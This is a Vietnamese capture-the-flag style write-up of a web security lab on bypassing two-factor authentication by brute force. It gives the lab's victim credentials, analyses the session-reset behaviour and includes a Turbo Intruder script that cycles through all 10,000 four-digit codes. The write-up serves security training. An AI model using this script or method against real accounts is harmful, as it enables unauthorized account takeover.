Lab: 2FA bypass using a brute-force attack

Mô tả

Xác thực hai yếu tố của phòng thí nghiệm này dễ bị tấn công bằng brute-force. Bạn đã có tên người dùng và mật khẩu hợp lệ, nhưng không có quyền truy cập vào mã xác minh 2FA của người dùng.

Thông tin về nạn nhân:carlos:montoya

Mục tiêu: Hãy brute-force mã 2FA và truy cập vào trang tài khoản của Carlos.

Phân tích

Brute-force trực tiếp có vẻ không hiệu quả. Nếu nhập sai 2 lần security code, phiên có vẻ như bị chấm dứt và CSRF token bị vô hiệu, người dùng bị đăng xuất. Tuy nhiên, ứng dụng không khóa tài khoản vì ta có thể thử lại ngay lập tức. Nếu ứng dụng thực hiện đúng và tạo mã 2FA mới cho mỗi lần đăng nhập, điều này không giúp ích gì. Nhưng nếu mã 2FA vẫn hợp lệ cho đến khi được sử dụng, có thể dùng brute force.

Quá trình yêu cầu đăng nhập cần nhiều bước để thực hiện, có thể sử dụng macro

Giải pháp

Tạo Macro

Tạo rule trong Project options > Sessions > Session Handling Rules

Trong Scope > URL Scope, chọn Include all URLs.

Tiến hành Brute-force

Có thể nhanh hơn với Turbo Intruder

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=1,
                           requestsPerConnection=100,
                           pipeline=False,
                           engine=Engine.BURP
                           )

    for num in range(0, 10000):
                        mfa_code = '{0:04}'.format(num)
                        engine.queue(target.req, mfa_code.rstrip())


def handleResponse(req, interesting):
 if req.status == 302:
  table.add(req)